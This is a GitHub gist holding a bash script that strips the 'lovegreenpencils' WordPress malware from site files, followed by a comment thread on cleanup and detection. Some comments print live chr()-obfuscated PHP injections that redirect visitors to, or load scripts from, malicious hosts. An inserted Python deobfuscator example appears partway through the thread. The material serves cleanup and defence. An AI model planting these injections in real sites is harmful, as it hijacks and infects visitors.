@black-dragon74
Created December 2, 2020 21:04
Fixes love green pencils wordpress malware
#!/bin/bash
# Regex to fix DB is: "s/<script[\s\S]*?>[\s\S]*?<\/script>//g"
totalInfections=0
filesProcessed=0

# Runs one phase: find every file containing $marker (case-insensitive),
# back it up as <file>.perlbak and strip the injection matched by the perl
# substitution $regex. perl -0777 slurps the whole file so the [\s\S]*?
# patterns can span lines, which line-by-line -p would never let them do.
fix_phase() {
    local marker="$1" regex="$2" f
    filesProcessed=0
    echo "Scanning....."
    # grep -Z plus read -d '' keep file names with spaces intact; the
    # process substitution keeps the counters in the current shell.
    while IFS= read -r -d '' f; do
        # Don't fix the fixer itself :D
        if [[ $f == "./fix.sh" ]]; then
            continue
        fi
        # If a backup exists, we created it, don't process it again
        if [[ $f == *.perlbak ]]; then
            continue
        fi
        # Otherwise fix all files recursively
        echo "Found file $f"
        echo "Backing up and fixing the infection"
        echo
        perl -0777 -pi.perlbak -e "$regex" "$f"
        ((filesProcessed++))
    done < <(grep -rilZ -- "$marker" ./*)
}

echo "Welcome to lovegreenpencils malware fixer by black-dragon74"
echo "This fix is divided into 3 phases."
echo "Phase 1 fixes the \`beckup\` files."
echo "Phase 2 fixes the header injections."
echo "Phase 3 fixes the deep rooted JS PHP and JSON injections"
echo

# Begin phase 1
read -rp "Press any key to begin phase 1: " yay
clear
fix_phase "Element.prototype.appendAfter" 's/Element\.prototype\.appendAfter[\s\S]*?\}\)\(\);//gi'
echo "Phase 1 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))

# Begin phase 2
read -rp "Press any key to begin phase 2: " yay
clear
fix_phase "REQUEST\['lt'\]" 's/<\?php\ \$v[\s\S]*?\?>//gi'
echo "Phase 2 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))

# Begin phase 3
read -rp "Press any key to begin phase 3: " yay
clear
fix_phase "lovegreenpencils" "s/<script\ type=\'text\/javascript\'\ src=\'https:\/\/dock\.lovegreenpencils[\s\S]*?<\/script>//gi"
echo "Phase 3 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))

# Processing complete.
echo
echo "Found, backed up and fixed $totalInfections infected files."
read -rp "Processing complete. Press any key to exit. " yay
exit 0
@korawit

korawit commented Jan 24, 2021

In my case I only changed

update wp_options set option_value='http://yoursite.com' where option_name='siteurl';
update wp_options set option_value='http://yoursite.com' where option_name='home';

@vinvin27

Amazing, thank you =)

@synstsia

> In my case I only changed
>
> update wp_options set option_value='http://yoursite.com' where option_name='siteurl';
> update wp_options set option_value='http://yoursite.com' where option_name='home';

Be careful with that: this thing pops a lot of back doors and javascript down where it can. It needs to be cleaned out entirely, as the site forwarding is the least malicious thing it does.

@abelbarraza3

I have found a new variation that is getting injected into a couple hundred files. I attempted to download your tool and update it to the new variation I found but it seems like I am doing it wrong.

Here is the new variation:

<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?>

@vinvin27

Do you have cPanel on your hosting account? If yes, you should have the Terminal app to launch those commands.

@felipesalas1

I’m trying to update the code to find the chr, but I’m not making it. Does someone know how I can add the new variation? I’m trying with this code:

for f in $(grep -ril "\$a=chr.*>"); do

@vinvin27

> I’m trying to update the code to find the chr, but I’m not making it. Does someone know how I can add the new variation? I’m trying with this code:
>
> for f in $(grep -ril "\$a=chr.*>"); do

Hello,

I wrote a post (in French): https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe you can use this: grep -ril '$a="h"."ea"."der"' ./* to find the new variation?

@felipesalas1

> > I’m trying to update the code to find the chr, but I’m not making it. Does someone know how I can add the new variation? I’m trying with this code:
> >
> > for f in $(grep -ril "\$a=chr.*>"); do
>
> Hello,
>
> I wrote a post (in French): https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
> Maybe you can use this: grep -ril '$a="h"."ea"."der"' ./* to find the new variation?

Thank you! I will try this.

I think I found the plugin that has the backdoor. It is a nulled version of Elementor Pro.

@vinvin27

Usually, the hacker infects a large amount of files. Beware and launch the grep command on the root directory.
Check if you don't have a file called "lte_" or something on the root, then check if you don't have any maintenance.php or maintenance folder or wp-sheeep in the plugin folder; also check if you don't have a wp-stream.php file on the root as well.

The best thing, I think, once the cleaning is done, is to export the DB, export uploads/, themes/, plugins/ and reinstall a fresh WP.

@therealmckellar

therealmckellar commented Mar 4, 2021

I am getting this error when running the script:

[screenshot of the error not reproduced]

@abelbarraza3

I am seeing a trend of a new variation of char code being used.
<?php echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(46).chr(100).chr(111).chr(110).chr(116).chr(107).chr(105).chr(110).chr(104).chr(111).chr(111).chr(111).chr(116).chr(46).chr(116).chr(119).chr(47).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(106).chr(115).chr(63).chr(122).chr(61).chr(105).chr(38).chr(105).chr(100).chr(61).chr(49).chr(49).chr(50).chr(38).chr(99).chr(108).chr(105).chr(100).chr(61).chr(53).chr(49).chr(50).chr(38).chr(115).chr(105).chr(100).chr(61).chr(55).chr(56).chr(57).chr(54).chr(51).chr(52).chr(53).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62); ?>
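The two chr() samples posted in this thread (this comment and abelbarraza3's earlier one) show why the gist's plain grep for its markers comes up empty on these variants: nothing in the raw file literally says lovegreenpencils or header. Here is an added example, not part of the gist or of any comment, that decodes the chr() chains and the split "h"."ea"."der" literal with no PHP execution, then checks the gist's three markers and pulls out the URL the injection points at; the sample file content is constructed in the same shape with a placeholder domain.

```python
import re

# One chr(N) call; the injection chains dozens of them with PHP's "." operator.
CHR_CALL = re.compile(r"chr\((\d{1,3})\)")
CHR_CHAIN = re.compile(r"chr\(\d{1,3}\)(?:\s*\.\s*chr\(\d{1,3}\))*")
# "h"."ea"."der" -> "header": drop the quote-dot-quote between adjacent literals.
SPLIT_LITERAL = re.compile(r'"\s*\.\s*"')
# Exactly the markers fix.sh greps for; nothing beyond what the thread names.
MARKERS = ("Element.prototype.appendAfter", "REQUEST['lt']", "lovegreenpencils")
URL = re.compile(r"https?://[^\s'\"<>]+")

def decode_chr_chain(chain: str) -> str:
    """Evaluate chr(a).chr(b)... without running PHP: map each code point to its character."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(chain))

def deobfuscate(php: str) -> str:
    """Return the PHP with chr() chains and split string literals rewritten as plain literals."""
    def as_literal(m):
        text = decode_chr_chain(m.group(0)).replace("\\", "\\\\").replace('"', '\\"')
        return '"' + text + '"'
    return SPLIT_LITERAL.sub("", CHR_CHAIN.sub(as_literal, php))

def scan(php: str) -> dict:
    """Decode first, then look for the thread's markers and the URL the injection points at."""
    decoded = deobfuscate(php)
    return {
        "decoded": decoded,
        "markers": [m for m in MARKERS if m.lower() in decoded.lower()],
        "urls": URL.findall(decoded),
        # True when a plain `grep -ril <marker>` on the raw file would find nothing at all
        "hidden_by_chr": not any(m.lower() in php.lower() for m in MARKERS),
    }

# Constructed sample in the shape of the $a="h"."ea"."der" variation quoted in the
# thread; the domain is a placeholder, not the real one from the posted payloads.
SAMPLE = (
    '<?php $a="h"."ea"."der";$a('
    "chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32)."  # "Location: "
    "chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47)."  # "https://"
    "chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110)."  # "lovegreen"
    "chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46)."  # "pencils."
    "chr(101).chr(120).chr(97).chr(109).chr(112).chr(108).chr(101).chr(47).chr(114)"  # "example/r"
    ");?>"
)

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Run it over each candidate file's contents instead of SAMPLE to see what a chr()-encoded injection really does before deciding on a removal regex.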
